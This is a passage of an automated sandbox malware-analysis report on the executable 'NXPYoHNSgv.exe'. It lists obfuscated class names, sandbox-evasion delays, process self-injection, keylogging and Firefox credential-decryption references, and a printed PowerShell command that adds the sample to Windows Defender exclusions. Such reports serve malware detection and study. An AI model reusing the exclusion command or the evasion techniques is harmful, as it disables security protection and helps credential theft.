Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, o1d9gStgXVOlEGar3e.cs High entropy of concatenated method names: 'psfjshgaOZ', 'PFYjRg07HF', 'SXyjX4gAoo', 'Gp1jiAN9cL', 'wy4jOtUQd7', 'aEBXyONbN6', 'oCDXVneKMq', 'nyUXNU4Yl0', 'fB3XvmXyoB', 'd94Xbsl0id'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, aRwY22Vs0Gal2sm3Ao.cs High entropy of concatenated method names: 'TPrnvJuTsx', 'op2nEThVt7', 'IYAZQ4tOfN', 'LFjZWHVurs', 'Tphn9oysW6', 'k6rn3UBhJG', 'tKBnMFFRuo', 'P0MnYCptpn', 'DpInH0D0x5', 'KYEnxQIvYY'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, D1Xaa2kb4p1B4Tw15W.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'yAQCb5hS6l', 'KtkCEsYuXR', 'xqhCzuZ1Ql', 'X276QJQ4vB', 'x6L6WxhikG', 'oKs6CL6Pr3', 'vFq665xxKp', 'TlC7eQJB2GuLdeLo0N2'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, NSqt8wWQ2RrVNunr9qC.cs High entropy of concatenated method names: 'nYEUdGWIq0', 'QBbU02dcqB', 'FSaUB5gTCS', 'o3AUm5fhFY', 'JvWUTPN1m9', 'NV5UJGasKL', 'OgcUafgMNi', 'w27USQjrtN', 'ICIUKCCXWb', 'T5gUppjTGq'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, jMlxVDb7OM3J9pVxlt.cs High entropy of concatenated method names: 'c07Zt3UlHb', 's9nZhetuqX', 'vRhZegZWNK', 'FJJZ4Q23r9', 'TpoZYL4AJL', 'yOTZFb1Y6G', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, XGFAS78spoJBcDbmwR.cs High entropy of concatenated method names: 'eUAncETVhn', 'XIqnfpNKR3', 'ToString', 'Ea5ng0KJTp', 'dcFnRNOhKT', 'NYKnkGfEKK', 'SBpnXvHPlm', 'VuLnjZNbLt', 'xSRnicmMpX', 'aDZnOes3Km'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, hZn5QLEbNAmkl46PVu.cs High entropy of concatenated method names: 'Ap5UWwR1DB', 'QDiU6KvI8f', 'Hj2UI0cbvV', 'EZsUgkj0Aj', 'umTURv1YN4', 'xfRUX5PDou', 'd9xUjuh4tY', 'wu4ZN974W5', 'YSAZvNCPUY', 'p7JZb3Jne5'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, BKDA4WvROyheC6jdlC.cs High entropy of concatenated method names: 'f2EZgn1cgf', 'DqGZRHaKAV', 'jSAZkC5g5q', 'zG7ZXPRlIp', 'CRnZj1oYxD', 'W9pZiVZYE8', 'WZvZOG1gB9', 'AbxZwqUr2T', 'MBhZcrKONf', 'MGmZfc7c17'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, EI9VY7W6CndmTPHTju9.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QqNPYCkFgg', 'dalPHWhknr', 'wdxPxvmUnB', 'obxP8dpaip', 'xghPyK1lu7', 'IyFPV1lyh7', 'rfRPNNwl9q'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, IFqjIiKhx4dgIGrjAv.cs High entropy of concatenated method names: 'D2Ykmppgjp', 'Re2kJJW8wl', 'KJVkSBGIi8', 'LNIkKmHFIG', 'tBFkLPAjdt', 'ohkkoDDOsm', 'HDDknhqQLu', 'EJ2kZE83ru', 'cECkUCQTun', 'yCIkPGEYEO'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, yEojYxIQkDkYwMfXZl.cs High entropy of concatenated method names: 'upQWiLPFeb', 'XotWO9WYKQ', 'jhxWc4dgIG', 'NjAWfv8YUq', 'JLRWLHLL1d', 'OgSWogXVOl', 'a2qVSbW86td4nghNCJ', 'DUuROCT55Lrxg3pOmD', 'HqwWWgEo8F', 'CDeW6PfT3T'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, aLPFebSbot9WYKQxSZ.cs High entropy of concatenated method names: 'ECYRYrbR3j', 'FyoRH847w5', 'lAlRx8eKw5', 'aHpR8E7qi1', 'qrFRyCeIST', 'AjORVb66IE', 'fHARNnL469', 'W2NRvKNhvn', 'ei4Rbw51s8', 'CftREyLudR'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, G1Nsw9DieHrvsA5hvT.cs High entropy of concatenated method names: 'wkuidIT7h1', 'ypli0o453a', 'OwfiBg8Cd6', 'F9wimfX4Ie', 'Qc6iTCjfkK', 'KeQiJpt9dl', 'fobiakKxQ2', 'MhOiShl1DS', 'xYLiKf8OsK', 'BQTippNqyK'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, KEObGFMDeIOfWIcUYG.cs High entropy of concatenated method names: 'Q271Sgqyyc', 'OAS1KfimiV', 'kvm1tAQUCy', 'LcZ1hdaoWr', 'TWr14wMVwF', 'L1A1F9iSbS', 'qxd15ilv5j', 'yb31ltvbKN', 'v0n1repiVH', 'ChU19XaMFA'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, RVlDSAOxRVyxPMKF9i.cs High entropy of concatenated method names: 'QVQ6sRo4Qc', 'uP86gZ5IM0', 'Nek6RGR836', 'tRV6kZMrP2', 'uGb6X81rUj', 'Mfp6jsEgaJ', 'nqT6ijfA2J', 'Ajt6ObMokK', 'uwL6w8sKxi', 'w7L6cSV64g'

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 1140000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 2E00000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 2C20000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 8030000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 7680000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 9030000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: A030000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 3120000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 3380000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 3120000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599890
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599781
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599671
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599562
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599453
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599343
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599234
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599125
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599015
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598905
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598781
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598671
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598562
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598453
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598343
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598234
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598117
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598015
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597890
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597765
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597641
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597390
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597281
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597171
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597059
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596937
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596828
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596718
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596609
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596500
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596390
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596281
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596156
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596047
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595937
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595828
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595718
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595609
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595500
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595390
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595265
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595155
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594995
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594718
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594437
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594312
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594203
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594093
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 593984
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 593875
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6094
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3673
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Window / User API: threadDelayed 7502
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Window / User API: threadDelayed 2341
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Window / User API: foregroundWindowGot 1762
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 6432 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4876 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599343s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599015s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598905s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598671s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598343s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598117s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -597890s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -597765s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -597641s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -597390s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -597281s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -597171s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -597059s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596718s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596281s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596156s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596047s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595937s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595828s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595718s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595609s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595500s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595390s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595265s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595155s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -594995s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -594718s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -594437s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -594312s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -594203s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -594093s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -593984s >= -30000s
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -593875s >= -30000s
Source: NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?6
Source: NXPYoHNSgv.exe, 00000005.00000002.4624610814.0000000004381000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4624610814.00000000043E6000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4624610814.0000000004464000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: J4knSQeMuQ4xl3aMiWsdY+VqLHwfWsbai3mq7BB2kmpINsaCuI7x+ryEnKOqPlX2udhT
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC9548 LdrInitializeThunk,LdrInitializeThunk, 5_2_06FC9548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NXPYoHNSgv.exe"
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NXPYoHNSgv.exe"
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory written: C:\Users\user\Desktop\NXPYoHNSgv.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NXPYoHNSgv.exe"
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Users\user\Desktop\NXPYoHNSgv.exe "C:\Users\user\Desktop\NXPYoHNSgv.exe"
Source: NXPYoHNSgv.exe, 00000005.00000002.4620367075.000000000379D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000038E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR
Source: NXPYoHNSgv.exe, 00000005.00000002.4620367075.000000000379D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000038E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000038E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagergerLR
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Users\user\Desktop\NXPYoHNSgv.exe VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
